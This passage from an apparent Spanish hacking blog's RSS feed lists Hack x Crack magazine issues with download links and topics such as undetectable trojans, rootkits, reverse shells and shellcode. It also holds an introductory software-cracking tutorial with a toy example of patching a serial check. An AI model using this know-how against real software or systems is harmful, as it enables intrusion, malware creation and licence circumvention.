-proxy: ocultando todos nuestros programas tras las cadenas de proxies<br />
-practicas de todo lo aprendido</p>
<p><a href="http://rapidshare.com/files/1734178/Cuadernos_HackxCrack_Numero_3.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1734178/&#8230;k_Numero_3.rar</span></a></p>
<p><strong>Cuaderno 4:</strong><br />
-Crea tu segundo troyano indetectable e inmune a los antivirus<br />
-Radmin: remote administrator 2.1, un controlador remoto a medida</p>
<p><a href="http://rapidshare.com/files/461740/Cuadernos_HackxCrack_Numero_4.pdf.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/461740/C&#8230;mero_4.pdf.rar</span></a></p>
<p><strong>Cuaderno 5:</strong><br />
-Aprende a compilar, paso obligado antes de explicarte los exploits<br />
-Rootkits, sin defensa posible<br />
-penetracion de sistemas por netbios<br />
-compilacion del netcat con opciones &#8220;especiales&#8221;<br />
-netbios: un agujero de seguridad no reconocido por microsoft<br />
-La pirateria en internet</p>
<p><a href="http://rapidshare.com/files/464620/Cuadernos_HackxCrack_Numero_5.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/464620/C&#8230;k_Numero_5.rar</span></a></p>
<p><strong>Cuaderno 6:</strong><br />
-Curso de visual basic: aprende a programar desde 0<br />
-Ficheros Stream (invisibles, peligrosos y ejecutables)<br />
-Rippeando videos Divx, El rey<br />
-Ocultacion avanzada de ficheros en windows xp<br />
-Listado de puertos y Servicios: imprescindible!!!<br />
-IPHXC: El tercer troyano de hack x crack (parte 1)<br />
-Trasteando con el hardware de una lan</p>
<p><a href="http://rapidshare.com/files/466514/Cuadernos_HackxCrack_Numero_6.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/466514/C&#8230;k_Numero_6.rar</span></a></p>
<p><strong>Cuaderno 7:</strong><br />
-Apache, El mejor servidor web- transforma tu pc en un servidor web<br />
-El cuarto troyano de Hack x Crack: El CCPROXY, un servidor oculto para anonimizar nuestras conexiones<br />
-IPHXC (segunda parte) nuestro tercer troyano<br />
-La inseguridad del protocolo POP3: Capturando las claves de nuestra cuenta de correo<br />
Los primeros pasos con IRIS (sniffando la red)<br />
-Accede por Telnet a servidores POP3, entendiendo los protocolos<br />
-Curso de visual basic, segunda entrega<br />
-Rippeando (2ª parte) el audio: AC3 &#8212; MP3 &#8211;OGG<br />
-Consigue una cuenta POP3 gratis</p>
<p><a href="http://rapidshare.com/files/468994/Cuadernos_HackxCrack_Numero_7.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/468994/C&#8230;k_Numero_7.rar</span></a></p>
<p><strong>Cuaderno 8:</strong><br />
-Linux: Netcat Perl &#8220;pipes&#8221;<br />
-Reverse shell, burlando al firewall<br />
-Encadenando programas<br />
-Penetracion inversa en PCs remotos<br />
-SMTP: descubre los protocolos de internet<br />
-Apache: Configuracion, comparte ficheros desde tu propio servidor web<br />
-Jugando de nuevo con el NETCAT<br />
-SERIE RAW: protocolos<br />
-Visual Basic: &#8220;Arrray de controles&#8221; &#8220;vectores&#8221; &#8220;ocx&#8221;</p>
<p><a href="http://rapidshare.com/files/471262/Cuadernos_HackxCrack_Numero_8.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/471262/C&#8230;k_Numero_8.rar</span></a></p>
<p><strong>Cuaderno 9:</strong><br />
-NMAP: El mejor escaneador de internet: instacion, interfaz grafica, opciones de uso<br />
-Iniciacion al PORT SCANNING &#8211; Tecnicas de &#8220;scaneo&#8221;<br />
-Serie RAW: IRC &#8211; Internet Relay Chat<br />
-Chateando mediante Telnet<br />
-GNU Linux- Permisos de archivo CAT y otros comandos<br />
-APACHE- Modulos y servidores virtuales<br />
-Descubre los protocolos de &#8220;la red&#8221; con nosotros<br />
-VISUAL BASIC &#8211; Creando librerias. Acceso a datos</p>
<p><a href="http://rapidshare.com/files/472735/Cuadernos_HackxCrack_Numero_9.pdf.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/472735/C&#8230;mero_9.pdf.rar</span></a></p>
<p><strong>Cuaderno 10:</strong><br />
-GNU LINUX- Gestion de usuarios, editores de texto: &#8220;VI&#8221;<br />
-Serie Raw: Conociendo protocolos y su seguridad<br />
-Curso de Visual Basic (V) acceso a datos II,<br />
-XML: el futuro de la transferencia de datos<br />
-Apache parte IV, trio de ases: APACHE- PHP- MYSQL</p>
<p><a href="http://rapidshare.com/files/597702/Cuadernos_HackxCrack_Numero_10.pdf.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/597702/C&#8230;ero_10.pdf.rar</span></a></p>
<p><strong>Cuaderno 11:</strong><br />
-Programacion en GNU Linux: Bash Scripting y C<br />
-Serie Raw: entendiendo los protocolos y su seguridad; Raw 5: FTP (File transfer protocol)<br />
-Intrusión en redes de área local, la pesadilla de todo administrador<br />
-Apache parte V: Configura tu servidor apache como servidor proxy<br />
-Validacion de documentos XML: DTD primera parte: creacion de DTDS<br />
-Curso de Visual Basic (VII) IIS Bug exploit: usando el webbrowser<br />
-Augusta Ada Byron, Lady Lovelace (1815-1852) el primer programa</p>
<p><a href="http://rapidshare.com/files/600664/Cuadernos_HackxCrack_Numero_11.pdf.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/600664/C&#8230;ero_11.pdf.rar</span></a></p>
<p><strong>Cuaderno 12:</strong><br />
-Explotando los servidores FTP:atravesando firewalls por ftp: aprende a utilizar los servidores ftp como anonimizadores!!!<br />
-Raw 6: FTP segunda parte<br />
-Servidor Web Apache: Protege tu apache configurandolo de forma segura: restriccion de accesos &#8211; autentificacion &#8211; analizando a nuestros visitantes &#8211; logs codificación &#8211; HTPASSWD &#8211; Cortafuegos<br />
-Visual Studio.net: crea tu propia herramienta de cracking<br />
-Validacion de documentos XML: DTD segunda parte, atributos y elementos<br />
-IIS bug exploit, nuestro primer scanner<br />
-Programacion en GNU/Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C</p>
<p><a href="http://rapidshare.com/files/712197/Cuadernos_HackxCrack_Numero_12.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/712197/C&#8230;_Numero_12.rar</span></a></p>
<p><strong>Cuaderno 13:</strong><br />
-Manipulación de documentos XML: El Dom, 1ª parte: teoria del Dom e intterfaz Domdocument<br />
-Programación en GNU/Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C<br />
-Curso de Visual Basic: un cliente, una necesidad, tenemos un proyecto (parte I)<br />
-RAW 7: HTTP (Hypertext Transfer Protocol)<br />
-Port Scanning: Escaneando ordenadoros Remotos: tipos de scaneos</p>
<p><a href="http://rapidshare.com/files/861054/Cuadernos_HackxCrack_Numero_13.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/861054/C&#8230;_Numero_13.rar</span></a></p>
<p><strong>Cuaderno 14:</strong><br />
-Curso de PHP, empezamos a programar, PHP (1)<br />
-Serie RAW ( DNS &#8211; Domain Name System<br />
-Curso de Visual Basic, un cliente, una necesidad, un proyecto, (parte II)<br />
-Programación en GNU Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C (III)<br />
-Manipulacion de documentos XML: El Dom 2ª parte. Interfaz XMLDOMNODE (I)<br />
-Tecnicas de Hijacking</p>
<p><a href="http://rapidshare.com/files/1247777/Cuadernos_HackxCrack_Numero_14.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1247777/&#8230;_Numero_14.rar</span></a></p>
<p><strong>Cuaderno 15:</strong><br />
-Curso de PHP (II) Aprende a programar tu propio generador de IPs<br />
-Serie XBOX Life, instalando Linux en una Xbox<br />
-RAW 9: MSN (Microsoft Messenger)<br />
-Curso de Visual Basic, Un cliente, una necesidad, un proyecto, (parte III)<br />
-Programación en GNU Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C (IV)</p>
<p><a href="http://rapidshare.com/files/1253922/Cuadernos_HackxCrack_Numero_15.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1253922/&#8230;_Numero_15.rar</span></a></p>
<p><strong>Cuaderno 16:</strong><br />
-Curso PHP: Aprende a manejar ficheros con PHP<br />
-Programación en GNU Linux, programación del sistema: El sistema I.P.C.<br />
-Manipulación de documentos XML: El DOM tercera parte<br />
-Serie XBOX LIFE: EVOLUTION X tu mejor amigo<br />
-RAW 10 &#8211; NNTP (Usenet)</p>
<p><a href="http://rapidshare.com/files/1258965/Cuadernos_HackxCrack_Numero_16.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1258965/&#8230;_Numero_16.rar</span></a></p>
<p><strong>Cuaderno 17:</strong><br />
-Hackeando un servidor Windows en 40 segundos!!!<br />
-Programación en GNU Linux: programación del sistema, el sistema I.P.C (II)<br />
-Curso de TCP/IP, introducción<br />
-Curso de PHP, (4ª entrega) Aprende a manejar cadenas de texto en PHP<br />
-Serie XBOX LIFE (III) Cambiando el disco duro y parcheando juegos</p>
<p><a href="http://rapidshare.com/files/1263795/Cuadernos_HackxCrack_Numero_17.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1263795/&#8230;_Numero_17.rar</span></a></p>
<p><strong>Cuaderno 18:</strong><br />
-Curso de PHP, manejo de formularios web<br />
-Serie XBOX LIFE (IV) Convirtiendo nuestra xbox en un centro multimedia<br />
-Programación en GNU Linux, memoria compartida<br />
-Curso de TCP/IP (2ª entrega) El protocolo de transporte UDP (protocolo de datagramas de usuario)<br />
-El lenguaje XSL, transformacion del documento XML<br />
-La realidad de los virus informáticos</p>
<p><a href="http://rapidshare.com/files/1399584/Cuadernos_HackxCrack_Numero_18.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1399584/&#8230;_Numero_18.rar</span></a></p>
<p><strong>Cuaderno 19:</strong><br />
-Programación en Gnu Linux, colas de mensajes<br />
-XBOX LIFE V &#8211; Jugando online gratis<br />
-Crackeando las restricciones de seguridad de windows<br />
-Curso de seguridad en redes &#8211; IDS<br />
-Curso de PHP &#8211; Aprende a manejar sockets con PHP</p>
<p><a href="http://rapidshare.com/files/1404999/Cuadernos_HackxCrack_Numero_19.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1404999/&#8230;_Numero_19.rar</span></a></p>
<p><strong>Cuaderno 20:</strong><br />
-Curso de PHP: Aprende a manejar sesiones<br />
-Curso de TCP/IP (3ª entrega) TCP, 1ª parte<br />
-XBOX LIFE VI, Menu X<br />
-Curso de seguridad en redes &#8211; IDS (II)</p>
<p><a href="http://rapidshare.com/files/1412210/Cuadernos_HackxCrack_Numero_20.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1412210/&#8230;_Numero_20.rar</span></a></p>
<p><strong>Cuaderno 21:</strong><br />
-Trabajando con bases de datos en PHP<br />
-Curso de TCP/IP: 4ª entrega: TCP 2ª parte<br />
-IDS, Sistema de Detección de Intrusos, tercera entrega, pluggins de salida en SNORT<br />
-XBOX LIFE VII, Creando nuestro Slayer</p>
<p><a href="http://rapidshare.com/files/1531307/Cuadernos_HackxCrack_Numero_21.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1531307/&#8230;_Numero_21.rar</span></a></p>
<p><strong>Cuaderno 22:</strong><br />
-Asaltando foros: guia paso a paso<br />
-Firewalls: Qué son, cómo funcionan y cómo saltárselos</p>
<p><a href="http://rapidshare.com/files/1537444/Cuadernos_HackxCrack_Numero_22.pdf.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1537444/&#8230;ero_22.pdf.rar</span></a></p>
<p><strong>Cuaderno 23:</strong><br />
-Cómo explotar fallos Buffer Overflow<br />
-Curso de TCP/IP: ICMP (protocolo de mensajes de control de internet)<br />
-Diseño de cortafuegos (parte II)</p>
<p><a href="http://rapidshare.com/files/1606357/Cuadernos_HackxCrack_Numero_23.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1606357/&#8230;_Numero_23.rar</span></a></p>
<p><strong>Cuaderno 24:</strong><br />
-Los bugs y los exploits, esos pequeños bichos y diablos<br />
-Curso de TCP/IP: La capa IP primera parte. Las direcciones IP<br />
-Hacking de Linux<br />
-Diseño de cortafuegos de red con iptables (3ª parte del curso de firewalls)</p>
<p><a href="http://rapidshare.com/files/1610074/Cuadernos_HackxCrack_Numero_24.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1610074/&#8230;_Numero_24.rar</span></a></p>
<p><strong>Cuaderno 25:</strong><br />
-Los bugs y los exploits, esos pequeños bichos y diablos, segunda parte<br />
-Vulnerabilidades Web, atacando la sesión de usuario<br />
-Curso de TCP IP: La capa IP, segunda parte, (los datagramas)</p>
<p><a href="http://rapidshare.com/files/1612765/Cuadernos_HackxCrack_Numero_25.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1612765/&#8230;_Numero_25.rar</span></a></p>
<p><strong>Cuaderno 26:</strong><br />
-Sombras en internet: sniffando la red &#8211; formas de detección &#8211; utilidades para la detección -ethereal: descripción. Capturando tráfico. Estableciendo filtros. Capturando información sensible. Telnet vs Secure shell<br />
-Atacando la caché DNS<br />
-Curso de TCP IP: La capa IP 3ª parte: fragmentación de datagramas</p>
<p><a href="http://rapidshare.com/files/1617905/Cuadernos_HackxCrack_Numero_26.pdf" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1617905/&#8230;_Numero_26.pdf</span></a></p>
<p><strong>Cuaderno 27:</strong><br />
-Taller de Python &#8220;episodio 1&#8243;<br />
-Taller de Criptografía &#8211; El sistema PGP<br />
-Curso de TCP IP: protección con iptables, en una red corporativa<br />
-Buffer Overflow<br />
-Hackeando el núcleo</p>
<p><a href="http://rapidshare.com/files/1628838/Cuadernos_HackxCrack_Numero_27.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1628838/&#8230;_Numero_27.rar</span></a></p>
<p><strong>Cuaderno 28:</strong><br />
-Hacking Estragegia, capitulo 1<br />
-Curso de Python, capitulo 2<br />
-Investigación, poniendo a prueba el antivirus<br />
-Explotando Heap/BSS Overflows, capitulo 2<br />
-Programación, curso de C, capitulo 1<br />
-Taller de criptografía, capitulo 2<br />
-La &#8220;ley de la mordaza&#8221;: informar es DELITO</p>
<p><a href="http://rapidshare.com/files/1647421/Cuadernos_HackxCrack_Numero_28.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1647421/&#8230;_Numero_28.rar</span></a></p>
<p><strong>Cuaderno 29:</strong><br />
-Hacking estrategia: infiltración en una red wireless protegida<br />
-Capitulo III: Taller de criptografía<br />
-Control de Logs en GNU/LINUX<br />
-Explotación de las Format Strings, capitulo III<br />
-Shatter Attacks<br />
-Curso de C, capitulo II<br />
-FAQ, curiosidades de Gmail/Google</p>
<p><a href="http://rapidshare.com/files/1652674/Cuadernos_HackxCrack_Numero_29.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1652674/&#8230;_Numero_29.rar</span></a></p>
<p><strong>Cuaderno 30:</strong><br />
-Taller de criptografía, capitulo IV<br />
-Ataques a formularios web<br />
-Los secretos del protocolo SOCKS<br />
-Creamos una Shellcode paso a paso<br />
-Capitulo III: Curso de C: Punteros y Arrays<br />
-Hack mundial</p>
<p><a href="http://rapidshare.com/files/1657597/Cuadernos_HackxCrack_Numero_30___foro_practicas.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/1657597/&#8230;racticas.rar</span></a></p>
<p>todos sin pass y listos para descargar <img src="http://www.foromsn.net/Caras/Guino.gif" alt="" /><br />
Que disfruteis con la lectura del fascinante mundo del hacking <img src="http://www.foromsn.net/Caras/Feliz.gif" alt="" /><br />
Salu2</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/allabouthack.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/allabouthack.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/allabouthack.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/allabouthack.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/allabouthack.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/allabouthack.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/allabouthack.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/allabouthack.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/allabouthack.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/allabouthack.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/allabouthack.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/allabouthack.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/allabouthack.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/allabouthack.wordpress.com/94/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=94&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://allabouthack.wordpress.com/2008/09/30/aprende-a-hacker-gracias-a-la-revista-hack-x-crack/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/1efffec6003e581178c69d44adf469ca?s=96&#38;d=monsterid&#38;r=X" medium="image">
			<media:title type="html">Mazingerzeta</media:title>
		</media:content>

		<media:content url="http://banners.es-facil.com/muestra_banner.php?c=64937221000" medium="image" />

		<media:content url="http://www.foromsn.net/Caras/Guino.gif" medium="image" />

		<media:content url="http://www.foromsn.net/Caras/Guino.gif" medium="image" />

		<media:content url="http://www.foromsn.net/Caras/Feliz.gif" medium="image" />
	</item>
		<item>
		<title>Intoducción al Cracking</title>
		<link>http://allabouthack.wordpress.com/2008/05/21/intoduccion-al-cracking/</link>
		<comments>http://allabouthack.wordpress.com/2008/05/21/intoduccion-al-cracking/#comments</comments>
		<pubDate>Wed, 21 May 2008 21:11:43 +0000</pubDate>
		<dc:creator>Nabster</dc:creator>
				<category><![CDATA[Cracking]]></category>

		<guid isPermaLink="false">http://allabouthack.wordpress.com/?p=91</guid>
		<description><![CDATA[Notas del autor: Este material completamente para uso educativo y no me hago responsable en absoluto del uso que el lector le pueda dar al mísmo ni de los daños y/o perjucios le pueda ocacionar. Si desea publicar este manual puede hacerlo libremente pero respetando los derechos de autor. Si Ud. no está de acuerdo [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=91&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Notas del autor: Este material completamente para uso educativo y no me hago responsable en absoluto del uso que el lector le pueda dar al mísmo ni de los daños y/o perjucios le pueda ocacionar. Si desea publicar este manual puede hacerlo libremente pero respetando los derechos de autor. Si Ud. no está de acuerdo con las condiciones de uso de este documento, por favor no lo lea y elimínelo de su disco duro.</p>
<p class="TXTss"><strong><em>Objetivos</em></strong></p>
<p class="txt">El objetivo de este manual es que los lectores interesados puedan intruducirse a este mundo del cracking desde otro enfoque diferente al que la gente conoce. Que puedan iniciarse con un mínimo de conocimientos previos que se les brindarán en este manual.</p>
<p class="TXTss"><strong><em>Concepto de Cracking</em></strong></p>
<p class="txt">Tambien recibe el nombre de Ingeniería Inversa, es la ciencia que estudia la seguridad de sistemas de protección tanto de software como de hardware con el objetivo de violarlos para aprender de ellos y obtener un beneficio personal sin fines de lucro. Podemos definirlo tambien de forma más generalizada como la acción que consiste en la modificación total o parcial de sistemas mediante alguna técnica específica para adaptarlos a las nececesidades personales de uno o bien solucionar fallas o errores de los mismos.</p>
<p class="TXTss"><strong><em>Breve introducción a la materia</em></strong></p>
<p class="txt">Casi todo el mundo ve al cracking como pirateria, como algo ilegal, aunque algo de razon hay aqui si se emplea incorrectamente como en la mayoría de los casos. Se supone que toda ciencia es usada para el bien, y el cracking deberia serlo. Seria bueno que los crackers aprendan desde el principio a estudiar los sistemas de protecciones comerciales para poder crear otros nuevos con meyor seguridad o bien mejorar los existentes e implementarlos en los futuros programas en vez de andar publicando cracks en internet, por que eso sí es ilegal. Entonces podriamos decir que existen crackers buenos y malos, de los buenos por suerte hay una buena cantidad, pero tambien hay muchos de los otros que quizas muchos de ellos tienen muy malas intenciones como la creacion de virus para ocacionar daños. El buen cracker puede considerar o no como &#8220;enemigo&#8221; a estos tipo de crackers, pero a diferencia del bueno, el malo tiene como enemigo Nº1 los autores de los programas.</p>
<p class="TXTss"><strong><em>Quién puede ser cracker?</em></strong></p>
<p class="txt">Es común ver que muchas personas creen ser crackers por el solo hecho de bajar un crack publicado de internet para registrar un shareware y probablemente luego venderlo. Ellos creen que esa acción es crackear, pero es un pensamiento erroneo, nosotros los crackers los vemos a ellos como verdaderos ignorantes. Entonces si ellos creen ser crackers, que queda para el autor del crack? Ambas partes se consideran complices de la pirateria lo cual no es bueno.<br />
Una persona debe reunir ciertos requicitos y cualidades para poder ser cracker, acá muestro los mas importantes:</p>
<p class="txt">- Conocimientos de Software y Hardware<br />
- Conocimientos de programacion en general<br />
- Conocimientos básicos de Assembler (Impresindible)<br />
- Muchas ganas e interés<br />
- Mucha dedicación y esfuerzo<br />
- Mucha paciencia y tiempo</p>
<p class="txt">Un cracker no se hace de un dia para el otro, esto puede llevar meses e iclusive años. Para ser bueno eso depende, pueden ser otros años mas, y para ser profesional&#8230; bueno, mejor cambiemos de tema.</p>
<p class="TXTss"><strong><em>Qué hay de las protecciones de software?</em></strong></p>
<p><span class="txt">La extraordinaria cantidad de programas que han sido crackeados, la mayoría fueron los programadores quienes hicieron el sistema de protección. El resto han sido los mismos crackers quienes lo programaron, y quien mejor si no entonces? estas protecciones presentaban gran dificultad para desprotegerlos, aunque se han visto programas que son casi imposible crackearlos y solo un cracker puede hacer un sistema asi, pero como ya sabemos nada es imposible, no existe 100% seguridad. Pero igualmente con esto logramos que las empresas desarrolladoras de software contraten a un buen cracker para proteger su software. También en internet hay muchas empresas de seguridad informática que están conformadas principalmente por crackers y hackers que prestan ese tipo de servicios y venden licencias de software con sistema proteccion incluida.<br />
Existen infinidades de maneras de proteger programas, las mas comunes de encontrar en los programa son los </span><span class="TXTss">siguientes:</span></p>
<p><span class="TXTss">Tiempo de uso limitado: </span><br />
<span class="txt">El programa puede caducar después de un período de tiempo determinado por el programador desde la fecha de instalación si no se registra el programa. Se suele limitar a minutos, horas, dias y meses.</span></p>
<p><span class="TXTss">Cantidad de ejecuciones limitadas: </span><br />
<span class="txt">El programa caduca luego de haberlo ejecutado una cantidad determinada de veces despuás de su instalacion si no se registra. </span></p>
<p><span class="TXTss">Numero de serie: </span><br />
<span class="txt">Esto es lo mas comun encontrar, existen de dos tipos, números de serie fijos o variables, éste ultimo se genera en la mayoria de los casos en base a algo, como por ejemplo en funcion del nombre de usuario, organizacion, etc. de esta manera se consigue un serial diferente y único para cada cliente o usuario. Pero también se suelen generar en función al nombre de la PC, del número de serie de disco o de algun otro componente del equipo. Y por último tenemos los números aleatorios, éstos son los más dificiles de crackear.</span></p>
<p><span class="TXTss">Mensajes molestos y/o nags: </span><br />
<span class="txt">Esto tambien es bastante común, son ventanas que pueden aparecer al inicio del programa o al final, o en alguna accion por parte del usuario en donde informa que se encuentra ante una copia no registrada o algun otro mensaje relacionado a la protección. Estos mensajes desaparecen al registrar.</span></p>
<p><span class="TXTss">Funciones desabilitadas: </span><br />
<span class="txt">Esto le dá a un shareware una escencia de que estamos ante una Demo pero no lo es en absoluto, generalmente deshabilitan funciones importantes de la aplicación, como por ejemplo: abrir, guardar, importar, exportar, imprimir, grabar, etc. Cuando registramos se habilitan todas.</span></p>
<p><span class="TXTss">CD-ROM: </span><br />
<span class="txt">Esta es la mas usada por los videos juegos. Debemos insertar el disco para poder jugarlos. Aveces hay juegos que están completamente instalados en el disco rigido pero nada más por seguridad nos piden el CD, otros realmente requieren archivos del mismo para su funcionamiento.</span></p>
<p><span class="TXTss">Archivos llave: </span><br />
<span class="txt">Es algo parecido al anterior pero funcionan de muchas formas diferentes dependendiendo de las habilidades del programador.</span></p>
<p><span class="TXTss">Anti-herramientas cracking:</span><br />
<span class="txt">Estas son muy efectivas si se utilizan técnicas novedosas o desconocidas para los crackers. Se pueden aplicar anti-depurador , anti-desensamblador, anti-monitores de registros o archivos, api, etc. Tambien anti-modificacion del ejecutable que seria algo como anti-editores hexadecimales.</span></p>
<p><span class="TXTss">Ejecutable comprimido y/o encriptado:</span><br />
<span class="txt">Esto también es muy efectivo si no se usan técnicas genericas. Por ejemplo con la compresion logramos disminuir el tamaño del ejecutable impidiendo que pueda ser desensamblado y también ocurre lo mismo con la encriptación. Pero tiene sus desventajas, con un depurador podemos ver el codigo en memoria ya descomprimido o desencriptado y se puede trabajar sobre él. Hay programas genericos que permiten descomprimir o desencriptar ejecutables para dejarlos tal y como lo vemos en memoria para poder aplicar parches. </span></p>
<p class="TXTss"><strong><em>Qué herramientas se utilizan?</em></strong></p>
<p class="txt">Para crackear no se necesitan tantas herramientas, pero las hay segun sea el caso, a continuación nombraré y describiré las principales:</p>
<p><span class="TXTss">Depurador: </span><br />
<span class="txt">(En inglés Debugger) Es un programa que en realidad ha sido creado para solucionar errores o bugs de otros programas. Permite ver instrucción por instrucción en assembler que ejecuta el microprocesador en memoria durante la ejecución del programa y además nos permite poner puntos de parada (BreackPoints) en cualquier parte del código durante la ejecución. Podemos editar en forma temporal la memoria, los registros y las instrucciones para alterar su comportamiento. Ejemplo: SoftICE, TRW2000.</span></p>
<p><span class="TXTss">Desensamblador: </span><br />
<span class="txt">(En inglés Disassembler) Es un programa que nos permite ver el código de un ejecutable en assembler e interactuar con él. Podemos ver referencias de texto, menúes y cuadros de dialogo, funciones importadas y exportadas del programa desensamblado. Ejemplo: W32Asm, IdaPro.</span></p>
<p><span class="TXTss">Editor Hexadecimal: </span><br />
<span class="txt">Con este programa podemos editar los bytes en hexadecimal de las instrucciones de cualquier ejecutable o archivo. Con esto hacemos los parches. Ejemplo: UltraEdit, Hview, HexWorkshop, etc.</span></p>
<p><span class="TXTss">Monitor de Archivos:</span><br />
<span class="txt">Este programa se encarga de mostrarnos secuencialmente en tiempo real los archivos que estan siendo manejados con operaciones de entrada y salida (I/O) y por que programa esta siendo utilizado. Ejemplo: FileMon.</span></p>
<p><span class="TXTss">Monitor de Registro:</span><br />
<span class="txt">Este programa es similar al anterior con la diferencia de que se refiere al registro de Windows. Ejemplo: RegMon</span>.</p>
<p><span class="TXTss">Monitor de Funciones API:</span><br />
<span class="txt">Este otro programa también es similar a los anteriores, nos permite espiar las funciones API utilizadas por un determinado programa en tiempo de ejecucion. Ejemplo: APIS32.</span></p>
<p><span class="TXTss">Descompresor:</span><br />
<span class="txt">Es un programa que sirve para descomprimir ejecutables comprimidos por algun compresor. Ejemplo: ProcDump.<br />
</span><span class="txt">Todas las herramientas se pueden encontrar en internet pero como toda herramienta antes de usarla por primera vez, debemos aprender a utilizarlas correctamente, hay cientos de manuales dedicados a las mas importantes, sobre todo el SoftICE que es muy dificil entenderlo. Como ya se habran dado cuenta necesitamos tener conocimientos de assembler para utilizarlas, por lo tanto busquense un buen manual para aprender</span>.</p>
<p class="TXTss"><strong><em>Un pequño ejemplo práctico</em></strong></p>
<p class="txt">Un programa es un conjunto de instrucciones que al ejecutarlo se cargan en memoria y éstas son ejecutadas una por una por el microprocesador. Muchas instrucciones impiden que se ejecuten otras como las instrucciones condicionales. Citaré un ejemplo un shareware cualquiera que hay que registrar por con un número de serie generado en base al nombre, si no introducimos el número correcto nos mostrará un mensaje de registración incorrecta. Qué ocurre en las instrucciones? Lo que aquí sucede es que hemos entrado a las rutinas de comprobación del serial del programa, que compara nuestro número de serie introducido con el número correcto, si son distintos muestra el mensaje de error y si son iguales nos muestra el de felicitacion y registra el programa. Saber assembler es fundamental para el crackeo, es un lenguaje de bajo nivel y practicamente el mas dificil de aprender. Ahora observaremos un pequeño ejemplo del algoritmo que hablamos representado en dicho lenguaje:</p>
<p class="txt">0001 push eax &lt;- Almacena nuestro número en el registro EAX<br />
0002 mov ecx, 0123 &lt;- Mueve el serial correcto al registro ECX<br />
0004 cmp eax,ecx &lt;- Compara nuestro serial con el verdadero<br />
0005 jne 0008 &lt;- Si son distintos nos muestra mensaje de error</p>
<p class="txt">Este sistema es uno de los mas sencillos y faciles de crackear que nos podemos encontrar, aunque casi no quedan de esos. Para crackearlo es muy facil, se pueden modificar varias cosas, pero normalmente se acostumbra a invertir el salto condicional JNE que salta a la direccion 0008 donde esta el mensaje de error si EAX y ECX no son iguales, por el salto JE que salta si son iguales para que continue ejecutandose la siguiente linea y con esto cuando registremos el programa, nos aceptará cualquier número de serie como válido, salvo que pongamos el serial real.</p>
<p class="TXTss"><strong><em>Palabras finales</em></strong></p>
<p class="txt">Con esto ya concluimos con este manual. La teoria necesaria para el cracking propiamente dicho merecen tutoriales especificos para temas en particular. Para los que se quieren iniciar, como ya he dicho, deben como primera medida aprender lo básico de assembler, aprender a usar las herramientas y luego leer tutoriales prácticos de crackeo para despues comenzar a practicar. Esas serían las pautas organizadas para que una persona se forme como cracker. Pero siempre recomiendo leer muchos manuales y tutoriales, muchisima práctica y entusiasmo si de verdad queres progresar.</p>
<p class="txt">[Texto sacado de portalhacker]</p>
